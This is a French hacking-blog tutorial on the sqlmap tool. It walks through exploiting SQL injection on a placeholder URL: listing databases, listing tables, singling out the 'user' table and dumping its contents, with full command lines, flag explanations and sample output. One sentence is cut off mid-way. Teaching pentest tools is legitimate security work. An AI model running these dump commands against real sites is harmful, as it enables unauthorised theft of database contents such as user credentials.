Hey !

Les failles SQL restent très (malheuresement) courantes sur le net. Énormement de sites ne s’en protégent pas par manque de connaissances, de sensibilisation ou tout simplement par manque de prise au sérieux.. Il est sans rappeler qu’une “simple” faille SQL peut causer d’énormes dégâts voir l’accès complet au système et à toutes les informations qu’il contient !

Bon passons, Sqlmap c’est quoi ? Sqlmap est un outil de pentest qui automatise la détection et l’exploitation des failles SQL, c’est l’outil le plus puissant que j’ai jamais utilisé dans ce domaine et de plus il est open-source ! (Mais que demande le peuple !)

Avant de commencer le tuto je tiens à rappeler que son utilisation est tolérée seulement dans un cadre légal.

Bien tout d’abord installons sqlmap : git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev ou sinon récuperez le fichier compressé sur le site officiel.

Une fois l’installation terminée, vous devriez avoir un nouveau dossier sqlmap-dev. Pour lancer sqlmap, il faudra donc lancé le fichier sqlmap.py mais avant ça énumérons les arguments nécessaires à son éxecution primaire :

-u : L’URL à tester comprenant au moins un argument testable

-p : Suggérer à sqlmap quel paramètre tester ( si plusieurs paramètres sont présents )

–dbs : récuperer la liste des bases de données (si l’url est faillible bien entendu)

Munissions nous de l’url faillible à exploiter : http://www.tutosql.yolo.fr/news.php?id=3&page=4

Récuperons la liste des bases de données présentes : python sqlmap.py -u "http://www.tutosql.yolo.fr/news.php?id=3&page=4" -p id --dbs

Une fois la tâche terminée, vous devriez voir un tableau apparaître, énumerons les bases de données trouvées :
available databases:
[*] tutosqlyolo_db
[*] information_schema

La BDD principale semble être tutosqlyolo_db, nous allons donc extraire les tables qu’elle contient : python sqlmap.py -u "http://www.tutosql.yolo.fr/news.php?id=3&page=4" -p id -D tutosqlyolo_db --tables

  • -D : Choisir la base de donnée qu’on veut exploiter.
  • –tables : Informe sqlmap qu’il doit lister toutes les tables contenues dans la base de donnée sélectionnée.

Une fois les tables extraites, vous devriez voir apparaître une nouvelle liste :

Database: tutosqlyolo_db
[5 tables]
+---------------+
| user |
| news |
| categorie |
| download |
| tag |
+---------------+

La table user nous semble assez intéressante : python sqlmap.py -u "http://www.tutosql.yolo.fr/news.php?id=3&page=4" -p id -D tutosqlyolo_db -T user --columns

  • -T : Choisir la table à cibler.
  • –columns : Informe sqlmap qu’il doit lister toutes les colonnes contenues dans la table sélectionnée.

De même la liste des colonnes devraient vous apparaître, il vous suffit

 


Commandes supplémentaires :

Dumper les informations d’une BDD/Table :

  • python sqlmap.py -u "http://www.tutosql.yolo.fr/news.php?id=3&page=4" -p id -D tutosqlyolo_db --dump
  • python sqlmap.py -u "http://www.tutosql.yolo.fr/news.php?id=3&page=4" -p id -D tutosqlyolo_db -T user --dump

Augmenter l’indice recherche de recherche ( + l’indice est haut plus sqlmap va faire des recherches avancées pour exploiter) : python sqlmap.py -u "http://www.tutosql.yolo.fr/news.php?id=3&page=4" -p id --level=5

[ L’arguement –level prend une valeur entre 1 et 5]


 

Published by Null

printf("Hello world");

Laisser un commentaire

Hacking/Coding Fr

130 User(s) Online Join Server
  • cursed.spooky_walter[57%]
  • SaltyMole
  • Dying Inside
  • StackFault
  • Maskassette-sama
  • El Famosos Führer Jaber
  • ¥oυи's C̶α̶я̶я̶ε̶я̶α̶
  • AnonTek
  • Xelzs ©
  • Meterpreter
  • Shutdown
  • Aeden